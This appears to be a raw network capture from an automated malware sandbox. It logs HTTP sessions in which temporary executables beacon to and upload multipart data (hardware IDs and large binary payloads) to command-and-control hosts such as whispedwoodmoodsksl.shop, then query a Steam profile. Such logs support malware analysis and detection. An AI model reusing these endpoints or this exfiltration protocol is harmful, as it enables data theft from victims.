                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            35 | 192.168.2.8 | 53132 | 190.147.128.172 | 80 | 4084 | C:\Windows\explorer.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            May 27, 2024 15:27:00.582448006 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://qvgxhyimdjdqth.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 264
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:27:00.582463980 CEST | 264 | OUT | Data Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3c 20 a7 f7
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA .[k,vu< sNl=QH)55jV)iZ)m_Y$.oHSTcT#9ZpGN KC)tZ`Zv3I}JOK2
                                                            May 27, 2024 15:27:01.657985926 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:27:01 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            0 | 192.168.2.8 | 53066 | 188.114.96.3 | 443 | 7992 | C:\Users\user\AppData\Local\Temp\5876.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-05-27 13:23:37 UTC | 271 | OUT | POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 8
                                                            Host: whispedwoodmoodsksl.shop
                                                            2024-05-27 13:23:37 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                            Data Ascii: act=life
                                                            2024-05-27 13:23:37 UTC | 812 | IN | HTTP/1.1 200 OK
                                                            Date: Mon, 27 May 2024 13:23:37 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=uh1c1bf702cv85k4kv8gk26k20; expires=Fri, 20-Sep-2024 07:10:16 GMT; Max-Age=9999999; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BU89%2B%2BMwJW0JaLFzQOgXBzxXHApqYJUgG1yhm7wOCPktntKMexY%2BStzaimAgtbfU2PqX8AyJ5FWxDE17dj9z82gQ5mcqPKceckywTSLLEoSeOOYg5CFXyErHVCFwUa7tjwCeT7OXEazM%2FUI%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 88a6520cbf5d2395-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-05-27 13:23:37 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                            Data Ascii: 2ok
                                                            2024-05-27 13:23:37 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            1 | 192.168.2.8 | 53068 | 188.114.96.3 | 443 | 7992 | C:\Users\user\AppData\Local\Temp\5876.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-05-27 13:23:38 UTC | 272 | OUT | POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 74
                                                            Host: whispedwoodmoodsksl.shop
                                                            2024-05-27 13:23:38 UTC | 74 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 73 77 67 35 45 47 2d 2d 26 6a 3d 38 62 61 63 36 34 34 31 36 36 63 64 64 32 32 30 34 64 30 66 61 33 30 36 31 37 32 62 30 32 35 34
                                                            Data Ascii: act=recive_message&ver=4.0&lid=swg5EG--&j=8bac644166cdd2204d0fa306172b0254
                                                            2024-05-27 13:23:38 UTC | 818 | IN | HTTP/1.1 200 OK
                                                            Date: Mon, 27 May 2024 13:23:38 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=cptrs1i2j7ltinfmq50rkjte7i; expires=Fri, 20-Sep-2024 07:10:17 GMT; Max-Age=9999999; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b%2BV72wMzgS%2FVN6t1Dh4Wz%2FKjxi%2BMgmsyJMtmZjqQyza40DPDJVKA4UxcOwK0Sh%2B3aXwYS8Z%2FOyUjbd795kO2HvrMXlU6FnMyHEi5CQca5OZ6bGQ86bKIG%2FLdEYC7012PPuHJXT6JEBhRyHI%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 88a65214d8451760-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            Data Ascii: cYMUMJGgybIrg2s70zLJpliA1gxpElER65JdvS+xNe5gsmgEIJHFzzbmfj7eAsGnxPjvbXg2UPzikwjEZuAsiim6SDD1oMgeE6ISPoYDxKrt8c5hMH5NZVtKSak3XUH6bI8sCaycqDfPohsj4x7o/uGllj10MxSty+ZckBK9Ke4MnhE8nK29S2uSMwPeAiWfpdjXDGj/GdWb9mGdc5FZ8hG2vRyUvUl7EppWPt4CwafE+O9teDZQ/OKTCMRm4Cy
                                                            2024-05-27 13:23:38 UTC1369INData Raw: 41 77 73 34 5a 30 44 62 72 34 62 78 78 2f 65 6e 4c 72 6b 73 55 35 68 4d 48 35 51 70 4b 4f 37 5a 50 41 72 50 53 33 4f 42 4a 38 74 54 5a 54 45 71 51 34 72 77 78 59 47 35 30 76 5a 78 36 53 6c 37 6c 6c 73 66 32 6d 52 36 35 4a 39 6e 58 4f 77 63 54 71 73 48 6d 55 63 71 61 6c 68 46 77 62 79 56 7a 75 4b 43 6c 6a 6d 6b 65 32 53 63 53 69 4c 71 55 48 6e 78 69 53 5a 73 37 45 31 7a 31 57 37 4c 56 47 74 77 4b 6e 4c 59 6f 35 66 39 36 63 75 69 4b 71 68 31 56 59 74 58 43 63 56 67 65 4c 61 47 4b 6c 4f 76 54 54 44 4e 63 38 55 4d 4f 57 67 79 46 59 32 6d 6d 38 37 36 7a 72 55 37 75 32 68 32 6a 56 6c 62 36 6c 6c 63 2f 59 31 6e 52 4f 6c 51 54 71 73 58 6d 6b 73 37 61 6b 78 57 33 4b 76 57 67 62 6e 59 39 6e 48 70 57 6e 36 50 57 52 4c 53 62 43 6a 70 31 33 30 4b 2b 52 73 6f 78 6d 37
                                                            Data Ascii: Aws4Z0Dbr4bxx/enLrksU5hMH5QpKO7ZPArPS3OBJ8tTZTEqQ4rwxYG50vZx6Sl7llsf2mR65J9nXOwcTqsHmUcqalhFwbyVzuKCljmke2ScSiLqUHnxiSZs7E1z1W7LVGtwKnLYo5f96cuiKqh1VYtXCcVgeLaGKlOvTTDNc8UMOWgyFY2mm876zrU7u2h2jVlb6llc/Y1nROlQTqsXmks7akxW3KvWgbnY9nHpWn6PWRLSbCjp130K+Rsoxm7


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            2 | 192.168.2.8 | 53071 | 188.114.96.3 | 443 | 7992 | C:\Users\user\AppData\Local\Temp\5876.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-05-27 13:23:39 UTC | 290 | OUT | POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 12841
                                                            Host: whispedwoodmoodsksl.shop
                                                            2024-05-27 13:23:39 UTC12841OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 46 33 32 45 30 31 39 41 34 32 37 38 38 44 30 41 36 41 44 45 41 32 33 36 38 43 38 41 44 38 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 73 77 67 35 45 47 2d 2d 0d 0a 2d 2d 62
                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"EF32E019A42788D0A6ADEA2368C8AD82--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"swg5EG----b
                                                            2024-05-27 13:23:40 UTC | 810 | IN | HTTP/1.1 200 OK
                                                            Date: Mon, 27 May 2024 13:23:40 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=ai1uvia382pr3hctb7g3t0ohun; expires=Fri, 20-Sep-2024 07:10:19 GMT; Max-Age=9999999; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1FP0sBH1WEl5RH1cCxbXUZF9Wm3borx2%2FP4AXdlGD89prz5UeauZZuz9BUUsoVgjgaTlP4VrmaTTIK3yVfMNBOETV5uS93x2ctTQ0TokSWp%2FvUyVTlvhk4%2F5rQkNfbsgtSzjnwaFxHCLLsQ%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 88a6521d8baf78df-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-05-27 13:23:40 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                                            Data Ascii: fok 8.46.123.175
                                                            2024-05-27 13:23:40 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            3 | 192.168.2.8 | 53074 | 188.114.96.3 | 443 | 7992 | C:\Users\user\AppData\Local\Temp\5876.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-05-27 13:23:41 UTC | 290 | OUT | POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 15070
                                                            Host: whispedwoodmoodsksl.shop
                                                            2024-05-27 13:23:41 UTC15070OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 46 33 32 45 30 31 39 41 34 32 37 38 38 44 30 41 36 41 44 45 41 32 33 36 38 43 38 41 44 38 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 73 77 67 35 45 47 2d 2d 0d 0a 2d 2d 62
                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"EF32E019A42788D0A6ADEA2368C8AD82--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"swg5EG----b
                                                            2024-05-27 13:23:41 UTC | 810 | IN | HTTP/1.1 200 OK
                                                            Date: Mon, 27 May 2024 13:23:41 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=ld83o519b0o1es6ge9ccskff5j; expires=Fri, 20-Sep-2024 07:10:20 GMT; Max-Age=9999999; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jHxW0YOZrbXWBbbyrhiLRCoAuQfXIUZ1nQ9E7BF5fME0dWeZzlq64N42uBllLJyAWxzyB7JYZZoez6M%2BqeurBmap0Gss0Vt%2BH4GMkGyqQTfBCeubB%2FWWqXM1P8uCYxe0mmxNRcRuk4ojd8Q%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 88a6522749f243d9-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-05-27 13:23:41 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                                            Data Ascii: fok 8.46.123.175
                                                            2024-05-27 13:23:41 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            4 | 192.168.2.8 | 53076 | 188.114.96.3 | 443 | 7992 | C:\Users\user\AppData\Local\Temp\5876.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-05-27 13:23:42 UTC | 290 | OUT | POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 20237
                                                            Host: whispedwoodmoodsksl.shop
                                                            2024-05-27 13:23:42 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 46 33 32 45 30 31 39 41 34 32 37 38 38 44 30 41 36 41 44 45 41 32 33 36 38 43 38 41 44 38 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 73 77 67 35 45 47 2d 2d 0d 0a 2d 2d 62
                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"EF32E019A42788D0A6ADEA2368C8AD82--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"swg5EG----b
                                                            2024-05-27 13:23:42 UTC4906OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 23 d1 61 a9 ef 87 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 3e 37 1c 1d 96 fa 7e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 c3 c1 e7 62 c9 e0 95 58 f0 4a f0 ab c1 ff 36 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc e4 dd 93 3c 16 af 54 8b b3 c5 72 6e a6 5a 98 2a 94 a7 ae e5 a6 2a 8d 72 3d 31 9a 3c bc 29 a5 d6 98 ff 70 58 68 ff bb af ff fe e4 44 a2 4b 2d b9 ca 4c ae 76 b9 91 af 16 6a c9 bb 46 a2 8c 4b 7d 38 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 61 38 3a 2c f5 fd 30 00 00 00
                                                            Data Ascii: s#a>7~sbXJ6<TrnZ**r=1<)pXhDK-LvjFK}8a8:,0
                                                            2024-05-27 13:23:43 UTC | 814 | IN | HTTP/1.1 200 OK
                                                            Date: Mon, 27 May 2024 13:23:43 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=9ohetou75lbi9bsf83e87aa9k6; expires=Fri, 20-Sep-2024 07:10:22 GMT; Max-Age=9999999; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tM3BVMBFiqRjkVpkPYmJEPUVLvFBPaXiaDJeZAhAB3v%2BiNkxevCrQNKNfWscfSGZdfcOAMVkRC%2BQkG0k2yC1cSwy6fqSP%2FKTA0YKkoX%2BeYflYX5TVpW%2F6PXjnrcMvGyqrDrPmCkmWPmiGw8%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 88a6522f2ae61a40-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-05-27 13:23:43 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                                            Data Ascii: fok 8.46.123.175
                                                            2024-05-27 13:23:43 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            5 | 192.168.2.8 | 53077 | 188.114.96.3 | 443 | 7992 | C:\Users\user\AppData\Local\Temp\5876.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-05-27 13:23:44 UTC | 289 | OUT | POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 5435
                                                            Host: whispedwoodmoodsksl.shop
                                                            2024-05-27 13:23:44 UTC5435OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 46 33 32 45 30 31 39 41 34 32 37 38 38 44 30 41 36 41 44 45 41 32 33 36 38 43 38 41 44 38 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 73 77 67 35 45 47 2d 2d 0d 0a 2d 2d 62
                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"EF32E019A42788D0A6ADEA2368C8AD82--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"swg5EG----b
                                                            2024-05-27 13:23:44 UTC | 808 | IN | HTTP/1.1 200 OK
                                                            Date: Mon, 27 May 2024 13:23:44 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=o09r657bmocsj3vndeopi83lsd; expires=Fri, 20-Sep-2024 07:10:23 GMT; Max-Age=9999999; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MUeHlBy7ggQh08NBYWC2rORhil6gnVwnhL46kcmhjuI5UF%2Bb%2B3bvJ9xAtzG9yVbsQjUEdSwaQSyDSNslMYT15q6p5wPqouW1CWTaihXbL9ySEicLZ0i3jkiuXihVG5JpO8DIR9XwovUgX0w%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 88a65238baed43cf-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-05-27 13:23:44 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                                            Data Ascii: fok 8.46.123.175
                                                            2024-05-27 13:23:44 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            6 | 192.168.2.8 | 53082 | 188.114.96.3 | 443 | 7992 | C:\Users\user\AppData\Local\Temp\5876.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-05-27 13:24:06 UTC | 289 | OUT | POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 1206
                                                            Host: whispedwoodmoodsksl.shop
                                                            2024-05-27 13:24:06 UTC1206OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 46 33 32 45 30 31 39 41 34 32 37 38 38 44 30 41 36 41 44 45 41 32 33 36 38 43 38 41 44 38 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 73 77 67 35 45 47 2d 2d 0d 0a 2d 2d 62
                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"EF32E019A42788D0A6ADEA2368C8AD82--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"swg5EG----b
                                                            2024-05-27 13:24:07 UTC | 820 | IN | HTTP/1.1 200 OK
                                                            Date: Mon, 27 May 2024 13:24:07 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=7s8i79364obrkh949cfrkg1arq; expires=Fri, 20-Sep-2024 07:10:46 GMT; Max-Age=9999999; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KKy%2Fg5YVMIhaTp%2FVLUIcwcS6GQoSg9RqN0Kqfat%2FEw4nDpo%2FzozvabC5MQc8vWA%2FyKoZlzDjo%2FqJfbuu%2BeuUivfJsNW80SVy5K2rbkghxtEZiT9pS1%2BewpAiSfsaiU9CaibkK15QRWUoR6I%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 88a652c5980c7d05-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-05-27 13:24:07 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                                            Data Ascii: fok 8.46.123.175
                                                            2024-05-27 13:24:07 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            7 | 192.168.2.8 | 53085 | 104.102.42.29 | 443 | 7360 | C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-05-27 13:24:10 UTC | 119 | OUT | GET /profiles/76561199689717899 HTTP/1.1
                                                            Host: steamcommunity.com
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:11 UTC | 1882 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Content-Type: text/html; charset=UTF-8
